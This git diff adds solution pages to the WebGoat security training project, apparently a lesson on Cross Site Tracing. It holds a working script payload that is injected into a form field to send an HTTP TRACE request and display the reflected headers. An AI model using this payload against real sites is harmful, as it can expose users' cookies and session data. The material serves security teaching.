+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Cambria;
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1073741899 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Perform Cross Site Tracing (XST) Attacks <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><!-- Start Instructions -->It
+is always a good practice to scrub all input, especially those inputs that will
+later be used as parameters to OS commands, scripts, and database queries. It
+is particularly important for content that will be permanently stored somewhere
+in the application. Users should not be able to create message content that
+could cause another user to load an undesireable page or undesireable content
+when the user's message is retrieved. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Tomcat is
+configured to support the HTTP TRACE command. Your goal is to perform a Cross
+Site Tracing (XST) attack.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<h2><span style='color:windowtext'>Solution:<o:p></o:p></span></h2>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>You need to
+introduce a cross site trace attack. This can be realized by embedding the
+following script in the three digit access code.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;script
+type=&quot;text/javascript&quot;&gt;if ( navigator.appName.indexOf(&quot;Microsoft&quot;)
+!=-1) {var xmlHttp = new
+ActiveXObject(&quot;Microsoft.XMLHTTP&quot;);xmlHttp.open(&quot;TRACE&quot;,
+&quot;./&quot;, false); xmlHttp.send();str1=xmlHttp.responseText; while
+(str1.indexOf(&quot;\n&quot;) &gt; -1) str1 = str1.replace(&quot;\n&quot;,&quot;&lt;br&gt;&quot;);
+document.write(str1);}&lt;/script&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_1370" o:spid="_x0000_i1025" type="#_x0000_t75"
+ style='width:480pt;height:276pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/TraceXSS_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/TraceXSS_files/image002.jpg" v:shapes="Picture_x0020_1370"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 15<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/TraceXSS_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/TraceXSS_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/TraceXSS_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/TraceXSS_files/filelist.xml b/main/project/WebContent/lesson_solutions/TraceXSS_files/filelist.xml
new file mode 100644
index 000000000..90de9a7db
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/TraceXSS_files/filelist.xml
@@ -0,0 +1,8 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../TraceXSS.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image002.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/TraceXSS_files/image001.png b/main/project/WebContent/lesson_solutions/TraceXSS_files/image001.png
new file mode 100644
index 000000000..1a73bd667
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/TraceXSS_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/TraceXSS_files/image002.jpg b/main/project/WebContent/lesson_solutions/TraceXSS_files/image002.jpg
new file mode 100644
index 000000000..fd3b3d48e
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/TraceXSS_files/image002.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/TraceXSS_files/themedata.thmx b/main/project/WebContent/lesson_solutions/TraceXSS_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/TraceXSS_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/UncheckedEmail.html b/main/project/WebContent/lesson_solutions/UncheckedEmail.html
new file mode 100644
index 000000000..c1aa214dd
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/UncheckedEmail.html
@@ -0,0 +1,672 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/UncheckedEmail_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/UncheckedEmail_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>4</o:Revision>
+  <o:TotalTime>16</o:TotalTime>
+  <o:Created>2007-07-11T10:37:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:31:00Z</o:LastSaved>
+  <o:Pages>2</o:Pages>
+  <o:Words>153</o:Words>
+  <o:Characters>878</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>7</o:Lines>
+  <o:Paragraphs>2</o:Paragraphs>
+  <o:CharactersWithSpaces>1029</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/UncheckedEmail_files/themedata.thmx">
